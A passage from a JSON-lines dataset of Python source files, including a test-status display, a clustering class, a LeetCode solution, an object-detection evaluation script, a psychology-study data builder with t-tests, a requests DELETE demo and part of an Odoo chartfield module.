status_block(os.environ['PDK_STATUSFILE'], 'w')\n mem.set_my_record(slot)\n mem.set_status_text(repr(text) + ',%d' % time.time())\n\n\n def display(visual, waiting_for_start):\n filename = 'pdk_statusfile'\n done_waiting = not waiting_for_start\n if waiting_for_start:\n while not os.path.exists(filename):\n time.sleep(1)\n\n m = status_block(filename, 'r')\n times = {}\n while True:\n if visual:\n sys.stdout.write('\\x1b[H\\x1b[J')\n elif m.header_changed():\n m = status_block(filename, 'r')\n done_waiting = not waiting_for_start\n else:\n any = 0\n for x in range(0, m.n_records):\n s = m.get_status_text(x)\n if s is None:\n sys.stdout.write('-')\n else:\n try:\n text, tyme = ast.literal_eval(s)\n except SyntaxError:\n text = str(s).strip()\n tyme = 'None'\n else:\n if tyme not in times:\n times = {}\n times[tyme] = str(datetime.datetime.fromtimestamp(tyme))\n tyme = times[tyme]\n text = str(text).strip()\n if text != '':\n any = 1\n done_waiting = 1\n sys.stdout.write('%2d %s %s' % (x, tyme, text))\n if visual:\n sys.stdout.write('\\x1b[K')\n sys.stdout.write('\\n')\n\n if test_mode:\n sys.stdout.write('%d %d %d\\n' % (\n time.time(), saw_locked, saw_changed))\n if not visual:\n break\n if not any:\n if 
done_waiting:\n break\n time.sleep(1)\n\n\n def display_interactive(args):\n display(1, 1)","sub_path":"pycfiles/pandokia-2.3.0.tar/run_status.cpython-36.py","file_name":"run_status.cpython-36.py","file_ext":"py","file_size_in_byte":9561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"311451740","text":"\nclass CCluster:\n\n def __init__(self, r):\n \n self.__t = []\n self.__r = r\n self.__S = 0\n self.__W = 0\n self.__A = None\n self.__ln = None\n self.__elems = [ {} for _ in range(22) ]\n\n def __len__(self):\n \n if self.__ln == None:\n \n self.__ln = len(self.__t)\n\n return self.__ln\n\n def __iter__(self):\n\n for t in self.__t:\n\n yield t\n\n def A(self):\n\n if self.__A == None:\n\n g = float(self.__S) / (self.__W ** self.__r) if self.__W else 0\n self.__A = g * len(self)\n\n return self.__A\n\n def append(self, t):\n \n if t not in self.__t:\n\n self.__t.append(t)\n self.__A = None\n self.__ln = None\n self.__S += t.D\n\n for (elem, ind) in t:\n\n if elem in self.__elems[ind]: self.__elems[ind][elem] += 1\n else: self.__elems[ind][elem] = 1\n\n if self.__elems[ind][elem] == 1: self.__W += 1\n\n def delete(self, t):\n \n if t in self.__t:\n\n del(self.__t[self.__t.index(t)])\n self.__A = None\n self.__ln = None\n self.__S -= t.D\n\n for (elem, ind) in t:\n\n self.__elems[ind][elem] -= 1\n if self.__elems[ind][elem] == 0: self.__W -= 1\n\n def __str__(self):\n\n ln = len(self)\n p = 0\n\n for t in self.__t:\n\n if t.cls() == \"p\":\n \n p += 1\n\n return \"%u transactions, %u p, %u e\" % ( ln, p, ln - p )\n\nclass CClusterSet:\n\n __len__ = lambda self: len(self.__clusters)\n __getitem__ = lambda self, ind: self.__clusters[ind]\n\n def __init__(self, r, cluster_num):\n\n self.__clusters = [ CCluster(r) for _ in range(cluster_num) ]\n\n def __iter__(self):\n\n for c in self.__clusters:\n\n yield c\n\n def delete(self, c_ind):\n\n del(self.__clusters[c_ind])\n\n def profit(self):\n\n A = 0\n B = 0\n\n for c in self.__clusters:\n\n A += c.A()\n B += len(c)\n\n return float(A) / B\n\n def profit_with_temporary_append(self, c_ind, t):\n\n self.__clusters[c_ind].append(t)\n profit = self.profit()\n self.__clusters[c_ind].delete(t)\n\n return profit\n\n","sub_path":"cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"186895921","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\nclass Solution:\n def maxDepth(self, root: 'Node') -> int:\n if root is None: return 0\n max_depth = 1\n def search(node, depth):\n if node is None: return\n nonlocal max_depth\n if depth > max_depth: max_depth = depth\n for child in node.children:\n search(child, depth+1)\n return\n\n search(root, 1)\n return max_depth\n","sub_path":"LeetCode/Easy/559MaximumDepthofN-aryTree-2.py","file_name":"559MaximumDepthofN-aryTree-2.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"212556469","text":"import os\nimport pandas as pd\n\nfrom metrics.BoundingBox import *\nfrom metrics.BoundingBoxes import BoundingBoxes\nfrom metrics.Evaluator import Evaluator\nfrom metrics.utils import CoordinatesType\n\nimport argparse\n# An example detection results file can be found at\n# 
https://drive.google.com/file/d/18PzWcAUwu9kdagB1Cz4XmH5r6kJdvx2p/view?usp=sharing\n# which can be evaluated against data/updated_seals.csv in this repo\nparser = argparse.ArgumentParser(description='Evaluate RGB Detectors.')\nparser.add_argument('--gts', help='Ground Truth CSV Path', required=True)\nparser.add_argument('--dets', help='Viame Detections CSV Path', required=True)\nparser.add_argument('--nms', default=.5, help='nms threshold', type=float)\nparser.add_argument('--iou', default=.5, help='iou threshold', type=float)\nparser.add_argument('--conf', default=0.0, help='minimum confidence threshold', type=float)\nparser.add_argument('--detectiononly', dest='detectiononly', action='store_true', help='evaluate detection only, ignoring class labels')\nparser.add_argument('--updated_csv', dest='updated_csv', action='store_true', help='for Yuvals updated csv only')\n\nargs = parser.parse_args()\n\nDETECTIONS_CSV = args.dets\nGROUND_TRUTH_CSV = args.gts\nNMS_THRESH = args.nms\nIOUThreshold = args.iou\nCONFIDENCE_THRESH = args.conf\nDETECTION_ONLY = args.detectiononly\nYUVALS_CSV = args.updated_csv\n\n\n# READ DATA FROM BOTH FILES INTO PANDAS\nground_truth_data = pd.read_csv(GROUND_TRUTH_CSV, dtype={'hotspot_id': object})\n\nx1_col, x2_col, y1_col, y2_col = \"color_left\",\"color_right\",\"color_top\",\"color_bottom\" # Use for original NOAA format\nnumeric_cols = [\"thermal_x\", \"thermal_y\", \"color_left\", \"color_top\",\n \"color_right\", \"color_bottom\"]\n\n# My updated labels file has different headers for box label bounds\nif YUVALS_CSV:\n x1_col, x2_col, y1_col, y2_col = \"updated_left\", \"updated_right\", \"updated_top\", \"updated_bottom\" # Use for files w/my updated labels\n\n numeric_cols = [\"thermal_x\", \"thermal_y\", \"color_left\", \"color_top\",\n \"color_right\", \"color_bottom\", \"updated_left\",\n \"updated_top\", \"updated_right\", \"updated_bottom\"]\n\nground_truth_data[numeric_cols] = \\\n ground_truth_data[numeric_cols].apply(pd.to_numeric)\n\nbounding_boxes = BoundingBoxes()\n#\n# Read the output csv file from VIAME and create BoundingBox objects using\n# the label with highest confidence for each box. 
Then do the same with the\n# ground truth csv file\n#\nwith open(DETECTIONS_CSV) as f:\n rows = [line.split(',') for line in f] # create a list of lists\n rows = rows[2:]\n for row in rows:\n det_id, img_name, frame_id, x1, y1, x2, y2, conf, _ = row[:9]\n\n det_id = int(det_id)\n x1 = int(x1)\n y1 = int(y1)\n x2 = int(x2)\n y2 = int(y2)\n conf = float(conf)\n label = \"ERR\"\n multilabels = row[9:]\n for i in range(0, len(multilabels), 2): # use label with highest confidence\n label_conf = float(multilabels[i + 1])\n if label_conf == conf:\n label = multilabels[i]\n if \"ringed\" in label:\n label = \"Ringed Seal\"\n if \"bearded\" in label:\n label = \"Bearded Seal\"\n if \"unk\" in label:\n label = \"UNK Seal\"\n if DETECTION_ONLY:\n label = \"Seal\"\n bbox = BoundingBox(imageName=img_name, classId=label,\n x=x1, y=y1, w=x2, h=y2, typeCoordinates=CoordinatesType.Absolute,\n bbType=BBType.Detected, classConfidence=conf, format=BBFormat.XYX2Y2\n )\n\n bounding_boxes.addBoundingBox(bbox)\nbounding_boxes=bounding_boxes.nms(NMS_THRESH, CONFIDENCE_THRESH) # NMS Step\nfor index, row in ground_truth_data.iterrows():\n hsId = row[\"hotspot_id\"]\n x1 = row[x1_col]\n x2 = row[x2_col]\n y1 = row[y1_col]\n y2 = row[y2_col]\n label = row['species_id']\n img_name = row['color_image']\n if DETECTION_ONLY:\n label = \"Seal\"\n bbox = BoundingBox(imageName=img_name, classId=label,\n x=x1, y=y1, w=x2, h=y2, typeCoordinates=CoordinatesType.Absolute,\n bbType=BBType.GroundTruth, format=BBFormat.XYX2Y2, hsId=hsId\n )\n\n bounding_boxes.addBoundingBox(bbox)\n\n\nevaluator = Evaluator()\nmetrics = evaluator.GetPascalVOCMetrics(bounding_boxes, IOUThreshold=IOUThreshold,\n CONFIDENCE_THRESH=CONFIDENCE_THRESH)\nprint(\"Ground truth file: %s\" % GROUND_TRUTH_CSV)\nprint(\"VIAME detections file: %s\" % DETECTIONS_CSV)\nprint(\"NMS %.3f - IOU %.3f - CONFIDENCE %.3f\" % (NMS_THRESH, IOUThreshold, CONFIDENCE_THRESH))\nprint(\"\\n\\n\")\n\nall_tps = []\nall_fps = []\nall_fns = []\nfor class_met in metrics:\n all_tps += class_met['TP_items']\n all_fps += class_met['FP_items']\n all_fns += class_met['FN_items']\n label = class_met['class']\n print(\"%s:\"%label)\n tps = class_met[\"total TP\"]\n fps = class_met[\"total FP\"]\n fns = class_met[\"total FN\"]\n if tps ==0 and fps == 0:\n print(\"No detections for class %s\" % label)\n continue\n precision = tps/(tps+fps)\n recall = tps / (tps+fns)\n print(\"TP %d - FP %d - FN %d\" % (int(tps),int(fps),int(fns)))\n print(\"Precision: %f\" % precision)\n print(\"Recall: %f\" % recall)\n print(\"\")\n\ntps_df = pd.DataFrame(all_tps)\nfps_df = pd.DataFrame(all_fps)\n\ntps_df = tps_df.sort_values('image')\nfps_df = fps_df.sort_values('image')\ntps_df = tps_df.reset_index(drop=True)\nfps_df = fps_df.reset_index(drop=True)\ntps_df = tps_df[['image','label','confidence','left','bottom','right','top','groundtruth_hs_id']]\nfps_df = fps_df[['image','label','confidence','left','bottom','right','top']]\ntps_df.to_csv(\"tps.csv\")\nfps_df.to_csv(\"fps.csv\")\n\n\n# False negatives gets saved as original ground truth csv format with only hotspots that are fns\nfns_df = ground_truth_data.loc[ground_truth_data['hotspot_id'].isin(all_fns)]\nfns_df.to_csv(\"fns.csv\")","sub_path":"scripts/evaluate_viame_rgb_detections.py","file_name":"evaluate_viame_rgb_detections.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"521749892","text":"from statistics import mean, stdev\r\nfrom scipy.stats import 
ttest_ind\r\nfrom pickle import dump\r\nimport os\r\nimport re\r\nimport numpy as np\r\nfrom collections import Counter\r\nfrom operator import itemgetter\r\nimport csv\r\n\r\nVIDEO_DIR = 'data\\\\VideoFiles\\\\'\r\nVIDEO_BL_DIR = 'data\\\\VideoBaselineFiles\\\\'\r\n\r\n\r\nDATA_DIR = 'data\\\\'\r\nDICT_FILE = 'data_dict'\r\nINVALID_LIST = [999,37,43]\r\n\r\n\r\ndef createParticipants():\r\n emotions = {\r\n 0: \"happy\",\r\n 1: \"sad\",\r\n 2: \"neutral\"\r\n }\r\n details = {}\r\n participants = {}\r\n with open(DATA_DIR + 'Participant.csv') as participantFile:\r\n for line in participantFile.readlines():\r\n details = {}\r\n l = [x.strip() for x in line.split(',')]\r\n if (l[0] == '0'):\r\n continue\r\n if (l[0] == 'NULL'):\r\n return participants\r\n #read details from participant data table\r\n identification = int(l[0][-3:])\r\n details['emotion'] = (emotions.get(int(l[2])), int(l[2]))\r\n details['videoBaseline'] = l[3]\r\n details['videoBaselineLabeled'] = l[4]\r\n details['videoBaselineData'] = l[5]\r\n details['video'] = l[6]\r\n details['videoLabeled'] = l[7]\r\n details['videoData'] = l[8]\r\n details['audioBaseline'] = l[9]\r\n details['audioBaselineData'] = l[10]\r\n details['audio'] = l[11]\r\n details['audioData'] = l[12]\r\n details['writingTime'] = float(l[13])\r\n details['ultimatumOffer'] = float(l[14])\r\n details['ultimatumOfferPercent'] = float(l[15])\r\n details['ultimatumInstructionRT'] = float(l[16])\r\n details['ultimatumDMrt'] = float(l[17])\r\n details['trustOffer'] = float(l[18])\r\n details['trustOfferPercent'] = float(l[19])\r\n details['trustInstructionRT'] = float(l[20])\r\n details['trustDMrt'] = float(l[21])\r\n selfReport = {}\r\n videoBLFreq = {}\r\n videoFreq = {}\r\n audioBL = {}\r\n audio = {}\r\n details['selfReport'] = selfReport\r\n details['videoBLFreq'] = videoBLFreq\r\n details['videoFreq'] = videoFreq\r\n details['audioBL'] = audioBL\r\n details['audio'] = audio\r\n participants[identification] = details\r\n\r\n return participants\r\n\r\n\r\ndef getSelfReportData(participantDict):\r\n #get info from self-report data table\r\n emotions = {\r\n 1: \"apathy\",\r\n 2: \"sadness\",\r\n 3: \"calm\",\r\n 4: \"amusement\",\r\n 5: \"grief\",\r\n 6: \"happiness\"\r\n }\r\n emotion = 1\r\n with open(DATA_DIR + 'SelfReport.csv') as selfReportFile:\r\n for line in selfReportFile.readlines():\r\n l = [x.strip() for x in line.split(',')]\r\n if (l[0] == 'NULL'):\r\n return\r\n if (emotion == 1):\r\n identification = int(l[1][-3:])\r\n participant = participantDict[identification]\r\n participant['selfReport'][emotions.get(emotion)] = int(l[3])\r\n emotion += 1\r\n if (emotion == 7):\r\n emotion = 1\r\n return\r\n\r\n\r\ndef getVideoData(participantDict):\r\n emotions = {\r\n 1: \"angry\",\r\n 2: \"disgust\",\r\n 3: \"fear\",\r\n 4: \"happy\",\r\n 5: \"sad\",\r\n 6: \"surprise\",\r\n 7: \"neutral\"\r\n }\r\n emotion = 1\r\n with open(DATA_DIR + 'VideoBaseline.csv') as videoBLFile:\r\n for line in videoBLFile.readlines():\r\n l = [x.strip() for x in line.split(',')]\r\n if (l[0] == 'NULL'):\r\n break\r\n if (emotion == 1):\r\n identification = int(l[1][-3:])\r\n participant = participantDict[identification]\r\n participant['videoBLFreq'][emotions.get(emotion)] = float(l[3])\r\n emotion += 1\r\n if (emotion == 8):\r\n emotion = 1\r\n\r\n with open(DATA_DIR + 'VideoEmotion.csv') as videoFile:\r\n for line in videoFile.readlines():\r\n l = [x.strip() for x in line.split(',')]\r\n if (l[0] == 'NULL'):\r\n return\r\n if (emotion == 1):\r\n identification = 
int(l[1][-3:])\r\n participant = participantDict[identification]\r\n participant['videoFreq'][emotions.get(emotion)] = float(l[3])\r\n emotion += 1\r\n if (emotion == 8):\r\n emotion = 1\r\n return\r\n\r\n\r\ndef getAudioData(participantDict):\r\n emotions = {\r\n 1: \"neutral\",\r\n 2: \"happy\",\r\n 3: \"sad\",\r\n 4: \"angry\",\r\n 5: \"fear\"\r\n }\r\n emotion = 1\r\n with open(DATA_DIR + 'AudioBaseline.csv') as audioBLFile:\r\n for line in audioBLFile.readlines():\r\n l = [x.strip() for x in line.split(',')]\r\n if (l[0] == 'NULL'):\r\n break\r\n if (emotion == 1):\r\n identification = int(l[1][-3:])\r\n participant = participantDict[identification]\r\n participant['audioBL'][emotions.get(emotion)] = float(l[3])\r\n emotion += 1\r\n if (emotion == 6):\r\n emotion = 1\r\n\r\n with open(DATA_DIR + 'AudioEmotion.csv') as audioFile:\r\n for line in audioFile.readlines():\r\n l = [x.strip() for x in line.split(',')]\r\n if (l[0] == 'NULL'):\r\n return\r\n if (emotion == 1):\r\n identification = int(l[1][-3:])\r\n participant = participantDict[identification]\r\n participant['audio'][emotions.get(emotion)] = float(l[3])\r\n emotion += 1\r\n if (emotion == 6):\r\n emotion = 1\r\n return\r\n\r\n\r\ndef getVideoEmotionProbMean(directory, filename_type, participants, key):\r\n for filename in os.listdir(directory):\r\n if re.match(filename_type + '[0-9]+', filename):\r\n participant_id = int(re.search('[0-9]+', filename).group()[-3:])\r\n with open(directory + filename, 'r') as f:\r\n emotions = f.readline().split()[1:]\r\n emotion_prob = np.array([0.0] * len(emotions))\r\n num_lines = 0\r\n for line in f.readlines():\r\n num_lines += 1\r\n prob = np.array([float(p) for p in line.split()[1:]])\r\n emotion_prob += prob\r\n emotion_prob = emotion_prob / num_lines\r\n emotion_dict = dict(zip(emotions, emotion_prob))\r\n participants[participant_id][key] = emotion_dict\r\n\r\n\r\ndef getVideoAboveThresholdEmotionFreq(directory, filename_type, participants, key):\r\n threshold = 0.5\r\n for filename in os.listdir(directory):\r\n if re.match(filename_type + '[0-9]+', filename):\r\n participant_id = int(re.search('[0-9]+', filename).group()[-3:])\r\n with open(directory + filename, 'r') as f:\r\n emotions = f.readline().split()[1:]\r\n emotions_count = Counter()\r\n for line in f.readlines():\r\n prediction = line.split()[0]\r\n probabilities = [float(p) for p in line.split()[1:]]\r\n if probabilities[emotions.index(prediction)] >= threshold:\r\n emotions_count[prediction] += 1\r\n total = sum(emotions_count.values())\r\n emotions_freq = {e:v/total for e,v in emotions_count.items()}\r\n # add zero frequencies for emotions that never passed threshold\r\n for e in emotions:\r\n if e not in emotions_freq.keys():\r\n emotions_freq[e] = 0\r\n participants[participant_id][key] = emotions_freq\r\n\r\n\r\ndef getVideoEmotionFreqSkipBeginning(directory, filename_type, participants, key):\r\n n_skip = 100\r\n for filename in os.listdir(directory):\r\n if re.match(filename_type + '[0-9]+', filename):\r\n participant_id = int(re.search('[0-9]+', filename).group()[-3:])\r\n with open(directory + filename, 'r') as f:\r\n emotions = f.readline().split()[1:]\r\n frames = f.readlines()\r\n frames_relevant = frames[n_skip:]\r\n frames_predictions = [line.split()[0] for line in frames_relevant]\r\n emotion_pred, emotion_counts = np.unique(frames_predictions,\r\n return_counts=True)\r\n emotions_freq = emotion_counts / len(frames_predictions)\r\n freq_dict = {e: c for e, c in zip(emotion_pred, emotions_freq)}\r\n # add 
zero frequencies for emotions that weren't found\r\n for e in emotions:\r\n if e not in freq_dict.keys():\r\n freq_dict[e] = 0\r\n participants[participant_id][key] = freq_dict\r\n\r\n\r\ndef getVideoFreqTopPercent(directory, filename_type, participants, key):\r\n percent = 5/100\r\n for filename in os.listdir(directory):\r\n if re.match(filename_type + '[0-9]+', filename):\r\n participant_id = int(re.search('[0-9]+', filename).group()[-3:])\r\n with open(directory + filename, 'r') as f:\r\n emotions = f.readline().split()[1:]\r\n emotions_pred_prob = []\r\n for line in f.readlines():\r\n prediction = line.split()[0]\r\n probabilities = [float(p) for p in line.split()[1:]]\r\n emotions_pred_prob.append((prediction,probabilities[emotions.index(prediction)]))\r\n total = len(emotions_pred_prob)\r\n # sort according to probabilites\r\n emotions_pred_prob.sort(key=itemgetter(1))\r\n top_percent = emotions_pred_prob[-round(percent*total):]\r\n emotions_pred_list = [e[0] for e in top_percent]\r\n emotion_pred, emotion_counts = np.unique(emotions_pred_list,\r\n return_counts=True)\r\n emotions_freq = emotion_counts / len(emotions_pred_list)\r\n freq_dict = {e: c for e, c in zip(emotion_pred, emotions_freq)}\r\n # add zero frequencies for emotions that weren't found\r\n for e in emotions:\r\n if e not in freq_dict.keys():\r\n freq_dict[e] = 0\r\n participants[participant_id][key] = freq_dict\r\n\r\n\r\ndef removeInvalidParticipants(participants):\r\n for invalid in INVALID_LIST:\r\n try:\r\n del participants[invalid]\r\n except KeyError:\r\n pass\r\n\r\n\r\n\r\ndef getPreliminaryQuestionnaireData(participantDict):\r\n dict = {}\r\n genders = {\r\n \"נקבה\": 0,\r\n \"זכר\": 1,\r\n \"אחר\": 2\r\n }\r\n statuses = {\r\n \"רווק/ה\": \"single\",\r\n \"נשוי/אה\": \"married\",\r\n \"גרוש/ה\": \"divorced\",\r\n \"אלמן/ה\": \"widowed\"\r\n }\r\n countries = {\r\n \"ישראל\": \"Israel\",\r\n \"ארצות הברית\": \"USA\",\r\n \"אתיופיה\": \"Ethiopia\",\r\n \"ברית המועצות לשעבר\": \"USSR\",\r\n \"צרפת\": \"France\"\r\n }\r\n educations = {\r\n \"עד תיכונית\": \"high-school\",\r\n \"תיכונית (בגרות מלאה)\": \"Bagrut\",\r\n \"אקדמאית- תואר ראשון\": \"Ba\",\r\n \"אקדמאית- תואר שני\": \"Ms\",\r\n \"אקדמאית- תואר שלישי\": \"Phd\"\r\n }\r\n yesOrNo = {\r\n \"כן\": 1,\r\n \"לא\": 0\r\n }\r\n economicStates = {\r\n \"נמוך\": 1,\r\n \"נמוך-בינוני\": 2,\r\n \"בינוני\": 3,\r\n \"בינוני-גבוה\": 4,\r\n \"גבוה\": 5\r\n }\r\n religiousAffiliations = {\r\n \"יהודית\": \"J\",\r\n \"מוסלמית\": \"M\",\r\n \"נוצרית\": \"C\",\r\n \"דרוזית\": \"D\"\r\n }\r\n agreement = {\r\n '1 (לא מסכים כלל)': 1,\r\n '2 (די מתנגד)': 2,\r\n '3 (לא מסכים ולא מתנגד)': 3,\r\n '4 (די מסכים)': 4,\r\n '5 (מסכים מאוד)': 5\r\n }\r\n with open(DATA_DIR + 'PreliminaryQuestionnaire.csv', newline='', encoding='utf-8') as f:\r\n reader = csv.reader(f)\r\n titles = next(reader)\r\n for row in reader:\r\n if row[0] == '':\r\n continue\r\n\r\n participant = participantDict.get(int(row[titles.index('מספר נבדק (המספר שפלג נתן לך)')]))\r\n if participant is None:\r\n continue\r\n participant['yearOfBirth'] = int(row[titles.index('שנת לידה')])\r\n participant['gender'] = int(genders.get(row[titles.index('מגדר')]))\r\n participant['status'] = statuses.get(row[titles.index('מצב משפחתי')])\r\n participant['Birthplace'] = countries.get(row[titles.index('ארץ לידה')],\"other\")\r\n participant['FatherBirthplace'] = countries.get(row[titles.index('ארץ לידת האב')], \"other\")\r\n participant['MotherBirthplace'] = countries.get(row[titles.index('ארץ לידת האם')], \"other\")\r\n 
participant['education'] = educations.get(row[titles.index('השכלה (ניתן לסמן גם אם הינך במהלך רכישת ההשכלה)')])\r\n participant['steadyIncome'] = int(yesOrNo.get(row[titles.index('האם הנך בעל/ת הכנסה קבועה או מלגה?')]))\r\n participant['economicState'] = economicStates.get(row[titles.index('כיצד הנך תופס/ת את מצבך הסוציו-אקונומי?')])\r\n altruism = 0\r\n for i in [titles.index(' [אעזור לאדם זר שלא יודע את הדרך להגיע ליעד]'),\r\n titles.index(' [אפרוט כסף עבור אדם זר]'),\r\n titles.index(' [אתן כסף לצדקה]'),\r\n titles.index(' [אתרום מוצרים/ בגדים לצדקה]'),\r\n titles.index(' [אתנדב בארגון צדקה]'),\r\n titles.index(' [אתרום דם]'),\r\n titles.index(' [אעכב את המעלית עבור אדם זר כדי שיספיק לעלות]'),\r\n titles.index(' [אתן למישהו שזקוק לכך לעקוף אותי בתור]'),\r\n titles.index(' [אעזור לחבר ללימודים שאיני מכיר היטב במטלה שמתקשה בה ]'),\r\n titles.index(' [אוותר על מקומי באוטובוס/רכבת בשביל זר שנאלץ לעמוד]')]:\r\n if row[i] == '5 (בסבירות גבוהה)':\r\n altruism += 5\r\n continue\r\n if row[i] == '1 (כלל לא סביר)':\r\n altruism += 1\r\n continue\r\n altruism += int(row[i])\r\n participant['altruism'] = altruism\r\n extroversion = 0\r\n introversion = 0\r\n extroversion += agreement.get(row[titles.index('אני רואה עצמי כאדם... [דברן]')])\r\n extroversion += agreement.get(row[titles.index('אני רואה עצמי כאדם... [אנרגטי]')])\r\n extroversion += agreement.get(row[titles.index('אני רואה עצמי כאדם... [מפגין התלהבות]')])\r\n extroversion += agreement.get(row[titles.index('אני רואה עצמי כאדם... [בעל אישיות אסרטיבית/החלטית]')])\r\n extroversion += agreement.get(row[titles.index('אני רואה עצמי כאדם... [חברותי ופתוח]')])\r\n introversion += agreement.get(row[titles.index('אני רואה עצמי כאדם... [מאופק]')])\r\n introversion += agreement.get(row[titles.index('אני רואה עצמי כאדם... [נוטה להיות שקט]')])\r\n introversion += agreement.get(row[titles.index('אני רואה עצמי כאדם... 
[עצור ומבוייש]')])\r\n #take mean of extra- and intra- version because number of questions are not equal\r\n participant['extroversion'] = extroversion / 5\r\n participant['introversion'] = introversion / 3\r\n participant['religion'] = religiousAffiliations.get(row[titles.index('השתייכות דתית')],\"other\")\r\n return\r\n\r\ndef main():\r\n participants = createParticipants()\r\n getSelfReportData(participants)\r\n getPreliminaryQuestionnaireData(participants)\r\n getVideoData(participants)\r\n getAudioData(participants)\r\n # variations of video data\r\n getVideoEmotionProbMean(VIDEO_DIR, 'VideoData', participants, 'videoProbMean')\r\n getVideoEmotionProbMean(VIDEO_BL_DIR, 'VideoBaselineData', participants,\r\n 'videoBLProbMean')\r\n getVideoAboveThresholdEmotionFreq(VIDEO_DIR, 'VideoData', participants,\r\n 'videoThresholdFreq')\r\n getVideoAboveThresholdEmotionFreq(VIDEO_BL_DIR, 'VideoBaselineData',\r\n participants, 'videoBLThresholdFreq')\r\n getVideoEmotionFreqSkipBeginning(VIDEO_DIR, 'VideoData', participants,\r\n 'videoFreqSkipBeg')\r\n getVideoEmotionFreqSkipBeginning(VIDEO_BL_DIR, 'VideoBaselineData',\r\n participants, 'videoBLFreqSkipBeg')\r\n getVideoFreqTopPercent(VIDEO_DIR, 'VideoData', participants, 'videoFreqTopPercent')\r\n getVideoFreqTopPercent(VIDEO_BL_DIR, 'VideoBaselineData', participants, 'videoBLFreqTopPercent')\r\n\r\n # remove invalid subjects\r\n removeInvalidParticipants(participants)\r\n\r\n # save dictionary\r\n with open(DATA_DIR + DICT_FILE, 'wb') as f:\r\n dump(participants, f)\r\n\r\n happy1 =[]\r\n happy2 = []\r\n sad1 = []\r\n sad2 = []\r\n neut1 = []\r\n neut2 = []\r\n pars = {\r\n \"happy\": [happy1, happy2],\r\n \"sad\": [sad1, sad2],\r\n \"neutral\": [neut1,neut2]\r\n }\r\n\r\n for participant in participants.values():\r\n stat = pars.get(participant['emotion'][0])\r\n stat[0].append(participant['ultimatumOffer'])\r\n stat[1].append(participant['trustOffer'])\r\n\r\n # mean & std\r\n print('happy ultimatum mean offer: {:0.3f}, std: {:0.3f}'.format(mean(happy1), stdev(happy1)))\r\n print('happy trust mean offer: {:0.3f}, std: {:0.3f}'.format(mean(happy2), stdev(happy2)))\r\n print('sad ultimatum mean offer: {:0.3f}, std: {:0.3f}'.format(mean(sad1), stdev(sad1)))\r\n print('sad trust mean offer: {:0.3f}, std: {:0.3f}'.format(mean(sad2), stdev(sad2)))\r\n print('neutral ultimatum mean offer: {:0.3f}, std: {:0.3f}'.format(mean(neut1), stdev(neut1)))\r\n print('neutral trust mean offer: {:0.3f}, std: {:0.3f}'.format(mean(neut2), stdev(neut2)))\r\n\r\n # t-test\r\n print('\\nt-test:')\r\n # ultimatum\r\n [h,p] = ttest_ind(happy1,neut1)\r\n print('ultimatum: happy vs neutral: t-stat={:0.3f}, p-val={:0.3f}'.format(h,p))\r\n [h,p] = ttest_ind(sad1,neut1)\r\n print('ultimatum: sad vs neutral: t-stat={:0.3f}, p-val={:0.3f}'.format(h,p))\r\n [h,p] = ttest_ind(happy1,sad1)\r\n print('ultimatum: happy vs sad: t-stat={:0.3f}, p-val={:0.3f}'.format(h,p))\r\n # trust\r\n [h,p] = ttest_ind(happy2,neut2)\r\n print('trust: happy vs neutral: t-stat={:0.3f}, p-val={:0.3f}'.format(h,p))\r\n [h,p] = ttest_ind(sad2,neut2)\r\n print('trust: sad vs neutral: t-stat={:0.3f}, p-val={:0.3f}'.format(h,p))\r\n [h,p] = ttest_ind(happy2,sad2)\r\n print('trust: happy vs sad: t-stat={:0.3f}, p-val={:0.3f}'.format(h,p))\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"BuildDictionary.py","file_name":"BuildDictionary.py","file_ext":"py","file_size_in_byte":19638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} 
+{"seq_id":"119653178","text":"import requests\nimport json\n\nif __name__ == '__main__':\n\turl = 'http://httpbin.org/delete'\n\tpayload = { 'nombre': 'Jairo', 'curso': 'python', 'nivel' : 'intermedio' }\n\theaders = {'Conten-Type': 'application/json', 'acces-toke': '12345'}\n\n\tresponse = requests.delete(url, data=json.dumps(payload), headers=headers)\n\n\t#GET para obtener algun recurso\n\t#POST para crearlo\n\t#PUT para actualizarlo\n\t#DELETE par eliminarlo\n\tprint(response.url)\n\n\tif response.status_code == 200:\n\t\t#print(response.content)\n\t\theaders_response = response.headers #Dic\n\t\tserver = headers_response['Server']\n\t\tprint(server)\n","sub_path":"ConsumirApis/consumirapidelete.py","file_name":"consumirapidelete.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"86241381","text":"# -*- coding: utf-8 -*-\nfrom openerp import tools\nfrom openerp import api, models, fields, _\nfrom openerp.addons.pabi_chartfield.models.chartfield import ChartField\n\n\nclass MergedChartField(ChartField):\n\n chartfield_id = fields.Many2one(\n 'chartfield.view',\n string='Budget',\n compute='_compute_chartfield',\n inverse='_inverse_chartfield',\n domain=[('model', '!=', 'res.personnel.costcenter')],\n )\n\n @api.multi\n @api.depends('chartfield_id')\n def _inverse_chartfield(self):\n for rec in self:\n res_id = rec.chartfield_id.res_id\n model = rec.chartfield_id.model\n vals = {'section_id': False, 'project_id': False,\n 'invest_asset_id': False, 'personnel_costcenter_id': False,\n 'invest_construction_phase_id': False}\n if model == 'res.section':\n vals.update({'section_id': res_id})\n if model == 'res.project':\n vals.update({'project_id': res_id})\n if model == 'res.invest.construction.phase':\n vals.update({'invest_construction_phase_id': res_id})\n if model == 'res.invest.asset':\n vals.update({'invest_asset_id': res_id})\n if model == 'res.personnel.costcenter':\n vals.update({'personnel_costcenter_id': res_id})\n rec.write(vals)\n\n @api.multi\n @api.depends('project_id', 'section_id', 'personnel_costcenter_id',\n 'invest_asset_id', 'invest_construction_id')\n def _compute_chartfield(self):\n for rec in self:\n model, res_id = False, False\n if rec.section_id:\n model, res_id = ('res.section', rec.section_id.id)\n if rec.project_id:\n model, res_id = ('res.project', 